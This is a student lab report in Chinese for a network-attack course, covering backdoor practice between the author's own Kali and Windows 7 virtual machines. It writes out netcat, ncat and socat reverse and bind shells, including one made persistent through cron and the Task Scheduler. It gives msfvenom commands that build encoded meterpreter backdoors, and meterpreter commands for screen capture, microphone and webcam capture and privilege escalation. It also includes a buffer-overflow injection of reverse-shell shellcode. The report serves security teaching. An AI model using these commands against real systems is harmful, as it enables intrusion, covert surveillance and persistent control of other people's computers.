2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践

1.实验内容

• (1)使用netcat获取主机操做Shell，cron启动
• (2)使用socat获取主机操做Shell, 任务计划启动
• (3)使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
• (4)使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
• (5)可选加份内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹链接Shell。加份内容一并写入本实验报告。

实验环境

• 关闭防火墙的win7虚拟机，个人ip地址为： 192.168.235.138 
• kali虚拟机.ip地址为： 192.168.235.137 
• 两台虚拟机能够ping通

实验中用到的工具

• netcat。在linux下叫ncat，咱们的kali机自带，能够直接用man ncat 命令查看。windows7中，直接在浏览器里从 GitHub下载或者从本身机子里拖拽进去。
• socat。netcat的加强版。安装方法同上。
• meterpreter。kali机自带，只在kali中用

实验步骤

1.使用netcat获取主机操做Shell，cron启动

win7为坏人，linux为受害者。cron启动

• win7监听，linux反弹链接
• win7中cmd窗口中输入： ncat.exe -l -p 9999 。 表示开始监听9999端口。注意，要在netcat所在的目录下进行输入。

 

• kali中输入命令  nc 192.168.235.138 9999 -e /bin/sh 。这时候win7的cmd窗口里就获取了linux的shell了

 

• cron启动。Cron是Linux下的定时任务，每一分钟运行一次，根据配置文件执行预设的指令。详细说明能够" man cron "。这里的cron启动时去让linux受害者去定时反弹链接win7。
• 用 crontab -e 指令去增长一条定时任务，
•  
格式以下

• # m分钟 h小时 dom日期 mon月 dow周几 command执行的命令
  12 * * * * /bin/netcat 192.168.235.138 9999 -e /bin/sh

   

 

• 写完输入指令 crontab -l 查看。  

•  

• 每一个小时的第12分钟，kali中就会自动执行那条指令，因此若是目标ip138的机子整好就在9999端口监听，那这时候就138就会得到kali的后门。固然也能够正向链接，linux做为受害者，cron指令写成 nc -l -p 9999 -e /bin/sh ，而后坏人机win7中 nc IP 9999 ，也能得到shell

linux为坏人，win7为受害者。

• linux监听，输入命令  nc -l -p 9999 
• win7去反弹链接，在ncat目录下输入  ncat.exe -e cmd.exe 192.168.235.137 9999 
•   这时在linux中能够看到win7的cmd命令窗口

•  

2.使用socat获取主机操做Shell。 任务计划启动

• 这意思是win7做为受害者，用系统里的任务计划启动，定时“要求被害”。因此，这里只作win7做为victim反向链接的。

 - 用 man socat 命令查看socat的介绍及相关用法： （socat图）

• win7中打开控制面板，点击管理工具里的计划任务

• 点击右侧的 建立任务 ，在 常规 选项卡里填名称，本身之后要认得出来

 

• 点击 触发器 选项卡，选择新建，而后将开始任务设置为 工做站锁定时 

 

• 再点击 操做 选项卡，点击新建，程序或脚本中选择socat.exe路径，在添加参数一栏中写 tcp-listen:5212 exec:cmd.exe,pty,stderr （做用是把cmd.exe绑定到端口5314，同时把cmd.exe的stderr重定向到stdout上），点击肯定 保存设置 ：

 

• 点击左侧的 任务计划程序库 ，点击右边的 显示全部任务 ，而后再中间部分找到本身刚建立的任务，右键运行，弹出一个taskeng.exe框，而后切换到kali

 

 

• 在Kali Linux中输入 socat - tcp:192.168.235.138:5212 命令，能够成功获得一个cmd shell：

 

3.使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

后门就是一个程序。

• 传统的理解是：有人编写一个后门程序，你们拿来用。
• 后来有一些牛人呢，就想编写一个平台能生成后门程序。这个平台呢，把后门的
  • 基本功能（基本的链接、执行指令），
  • 扩展功能（如搜集用户信息、安装服务等功能），
  • 编码模式，
  • 运行平台，
  • 以及运行参数
• 全都作成零件或可调整的参数。用的时候按须要组合，就能够生成一个可执行文件。 典型的平台就包括有：
• intersect
• Metaspolit的msfvenom指令
• Veil-evasion

咱们接下来学习如何使用msfenom生成后门可执行文件。咱们要生成的这个后门程序是Meterpreter. 揭开Meterpreter的神秘面纱介绍了meterpreter的一些底层原理。

• 简单粗暴 msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212_backdoor.exe  指令生成一个exe后门程序。完整指令是：

  msfvenom -p windows/meterpreter/reversetcp -x ./fenix.exe -e x86/shikataganai -i 5 -b ‘\x00’ LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212_backdoor.exe

   

• 参数说明：

  •  -p  使用的payload。payload翻译为有效载荷，就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode
  •  -x 使用的可执行文件模板，payload(shellcode)就写入到这个可执行文件中
  •  -e  使用的编码器，用于对shellcode变形，为了免杀
  •  -i  编码器的迭代次数。如上即便用该编码器编码5次
  •  -b badchar 是payload中须要去除的字符
  •  LHOST  是反弹回连的IP
  •  LPORT 是回连的端口
  •  -f  生成文件的类型
  •  >  输出到哪一个文件

 

• 如今文件生成好了，先再win7的命令行中输入 ncat -l 5212> 20165212backdoor.exe 开启监听并将接受的数据写入20165212backdoor.exe文件中

 

• 再kali中用 ncat -nv 192.168.235.138 5212 < 20165212_backdoor.exe  指令将数据传过去

• 彳亍，如今要用msf了，一个强大的平台。。。本身感觉。kali中输入 msfconsole ：

 

• 依次输入如下命令

  • use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.235.137 //注意此处应为Linux的IP!
    set LPORT 5212 //后门程序里的端口号
    show options
    exploit

     

 

• 说明：

  • LHOST须要和上一步生成backdoor.exe的一致，本例中即192.168.235.137，坏人的ip
  • LPORT也须要和上一步生成backdoor.exe的一致，即5212；
  • payload也要一致，即windows/meterpreter/reverse_tcp

• 如今去win中双击运行20165212_backdoor.exe，点后win7没反应，而后切回kali，经过msf的监听进程得到win的主动连接，并获得远程控制shell

 

4.使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 承接上面的。要是误操做什么的不当心关掉了其中什么东西也ok，win中任务管理器再进程中结束backdoor.exe，而后再照上面敲一遍。

• 获取截屏： screenshot  （截屏命令图（抓的屏图12））

•  

•  

•  

• 获取音频： record_mic 

• .

   

•  

• 获取摄像头和录像： webcam_snap / webcam_stream 。.

• 第一次没成功，错误提示以下 由于win7上没有装驱动 ，在虚拟机窗口右下角有个摄像头图标，点它就自动安装驱动了

•   

   

   

•  

   

• 可是这个很蠢，由于摄像头上的灯会亮，你偷拍别人会知道.. 

•  getuid 获取运行msf会话的用户名，从而查看当前会话具备的权限

•  sysinfo 得到目标系统的信息，机器名、操做系统等
•  shutdown 命令，建议不要过早的尝试这个命令
•  ps 得到受害者机上运行 的进程信息

 

•  migrate [] 命令，例如我把msf会话移植到1588 中，是explorer.exe，稳定的系统服务。从头想起，咱们的实验是把受害者绑起来给他植入后门，很无脑。若是是正常的利用系统漏洞、浏览器漏洞溢出而获得的会话，好比IE浏览器，那么msf meterpreter代码存在于IE的内存空间中，那边关掉IE浏览器，msf会话就没了，可是若存在于 explorer这样稳定的系统服务中，就能一直用。并且，这种移植是“无缝移植”，不用断开已有的TCP链接。

 

•  execute 命令，例如我直接与win的cmd.exe交互，输入 execute -H -i -f cmd.exe ，获得下图所示的shell

 

•  upload / download 命令，顾名思义——往受害机传/从受害机下载 文件
• .

   

•  

•  cat / edit  命令，查看/编辑文本

 

• 权限提高： getsystem ，而后 getuid 查看权限（下图中好像已是管理员权限）

• 更多的meterpreter经常使用指令能够经过输入 help 获取 

5.可选加份内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹链接Shell

• 这个任务是kali监听本身，本身用msfvenom -p linux/meterpreter/shell_reverse_tcp -b '\x00\x0a' LHOST=192.168.235.137 LPORT=5212 -f c 命令生成一段shellcode，复制下来去文本里删掉全部引号和回车。若是后面 cat注入运行pwn1文件时 ps命令找不到pwn1进程，说明你的shellcode有坏字符。还有，生成的shellcode里不能有\00和\0a，这两个字符会致使进程秒死- -。虽然指令已经屏蔽了这两个字符，可是编译器不靠谱，须要本身再去检查肉眼检查就彳亍。
•  

   

•  perl -e 'print "A" x 32;print "\xa0\xd2\xff\xff\xda\xd5\xd9\x74\x24\xf4\xbd\xb2\x18\x85\x38\x5a\x31\xc9\xb1\x12\x31\x6a\x17\x83\xea\xfc\x03\xd8\x0b\x67\xcd\x2d\xf7\x90\xcd\x1e\x44\x0c\x78\xa2\xc3\x53\xcc\xc4\x1e\x13\xbe\x51\x11\x2b\x0c\xe1\x18\x2d\x77\x89\x5a\x65\x6c\xc0\x33\x74\x73\xc6\x9f\xf1\x92\x56\x79\x52\x04\xc5\x35\x51\x2f\x08\xf4\xd6\x7d\xa2\x69\xf8\xf2\x5a\x1e\x29\xda\xf8\xb7\xbc\xc7\xae\x14\x36\xe6\xfe\x90\x85\x69"' > input_try  命令生成input_try文件，要根据本身shellcode改！（这段shellcode的起始地址就是前4个字节是我已经找好地址的，正常流程须要像实验1同样在前面写1234而后去找地址，shellcode的起始地址应该就是esp里存的地址+4）
•  

   

• 新终端里mfconsole命令运行msf，输入下列指令

•  use exploit/multi/handler
  set payload linux/x86/shell_reverse_tcp
  set LHOST 192.168.235.137 //注意此处应为Linux的IP!
  set LPORT 5212 //后门程序里的端口号
  show options
  exploit

   

•  

   

• 而后在原来终端里(cat input_try;cat) | ./pwn1运行，回车一下，ok，而后等....等我找出毛病在哪（前面思路应该没问题，估计问题出在生成shellcode指令那里，由于找不到参考资料- -）
• 我试了127.0.0.1 回环地址和msf使用的5432端口生成shellcode，也是同样的监听不到。如今来回顾一下：首先，我用msfvenom命令生成了能反弹链接的shelldoce，假设这段shellcode能实现反弹链接功能，而后我把它注入到pwn1里，32个A覆盖缓冲区和esp，随后pwn1文件就会跳转到你shellcode的起始地址开始执行反弹链接操做，地址反复核对没问题，gdb调试注入后的pwn1文件可以看到esp后面内存里放的东西就是shellcode，意味着我这边运行注入的pwn1程序回车一下，会马上跳到shellcode并运行，可是msf里监听不到链接。我认为是生成shellcode的指令有问题，就是那条msfvenom指令（生成linux系统下的）， 书上和网上能找到的参考资料颇有限，就是-playroad 后面的参数，我就找到了一篇博客涉及到写法，并且就写了3个词....作到这里，，有点绝望。个人思路应该没啥问题，但愿你们能够针对个人上述操做哪些地方可能存在问题在评论区指出！

 ———————上面的一堆是失败的通过。。下面是成功的,可是是不符合要求的，随便看看就好———————

•  失败的缘由在于我看的书、资料、博客太少了
•  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.235.137 LPORT=5212 -x /home/20165212/exp2/exp2+/pwn1 -f elf > pwn2  这个指令，直接msf再pwn1基础上生成一个注入了的shellcode的文件pwn2，而后去 msfconsole 运行msf，输入下列指令

•  use exploit/multi/handler
  set payload linux/x86/meterpreter/reverse_tcp
  set LHOST 192.168.235.137 //注意此处应为Linux的IP!
  set LPORT 5212 //后门程序里的端口号
  show options
  exploit

   

• 而后另个终端里chmod +x 赋执行权限，而后./pwn2那边就监听到了
•  

 

 ———————下面是符合要求的、成功的！———————

• 这一项的要求：生成shellcode，注入pwn1文件，运行pwn1文件，pwn1进程通过缓冲区溢出后返回到shellcode的起始地址，而后开始去反弹链接坏人，坏人得到受害者的shell（这里面坏人和受害者都是linuxkali）
• 以前错因分析：msfvenom指令生成的shellcode代码存在问题，因为本人能力问题，无法找出机器码中的错误在哪。
• 步骤：https://www.exploit-db.com/shellcodes，这是一个shellcode网站，上面生成的的shellcode都是通过测试过可用的。在网站里找一个linux/x86平台的，反弹链接的shellcode，下载，复制出里面的机器码

•  

   

•  而后再linux使用用这段shellcode生成input_1文件，固然了，前面要先经过gdb找好 shellcode的起始地址，写在最前面。具体命令是：

  perl -e 'print "A" x 32;print "\xa0\xd2\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_1

   

•  而后另外一个新终端里msfconsole打开msf，接着输入如下指

•  use exploit/multi/handler
  set payload linux/x86/shell_reverse_tcp
  set LHOST 127.0.0.1 
  set LPORT 4444 //这两个都是根据你的shellcode来的
  show options
  exploit

   

• 原终端里 (cat input_1;cat) | ./pwn1 运行pwn1，再回车一下，那边就能看到链接成功了

•  

•  

 

 

 

基础问题回答

 

(1)例举你能想到的一个后门进入到你系统中的可能方式？

 

——玩游戏的会后开外挂，那时候我会本身关掉windows Defender和杀软。游戏外挂经过驱动劫持（声卡），在和服务器数据互动的时候实现篡改。或者是浏览器漏洞，例如我用edge浏览器写博客，它莫名其妙本身崩溃，还不保存！edge是win10自带 的一个浏览器，兼容性应该没问题，因此频繁崩溃的缘由可能在于进程冲突、浏览器漏洞……

(2)例举你知道的后门如何启动起来(win及linux)的方式？

——我玩游戏开外挂，那个外挂程序就是一个后门，在我启动wegame时它会跟着启动（不隐藏），这应该是手动触发启动

(3)Meterpreter有哪些给你映像深入的功能？

——shut down

(4)如何发现本身有系统有没有被安装后门？

——日志，进程查看

实验总结与体会

总结：

实验内容较多，尤为是是meterpreter实践，有不少不少事能够作，我只写了看起来重要且经常使用的一些指令，更多的请参考《Metasploit渗透测试魔鬼训练营》。本次实验在一个理想化程度很高的环境下完成，这样在现实中是没有任何意义的。相比较于msf中花里胡哨的操做，我以为更重要的仍是去研究有堆栈保护、有杀软、有防火墙的环境下如何渗透目标，哪怕是一个bit，由于要在那样的基础上咱们后续的实验、操做才有可行性。或者是几我的凑各团队，每一个人负责一块。

体会：

markdown里传图片功能坏了。。。针对第  5个任务，虽然如今作完了，可是我继续去用第一种思路调指令，调好了再改。你们有什么想法或者思路或者发现我哪里作得有问题 请不要吝啬啊，评论区互动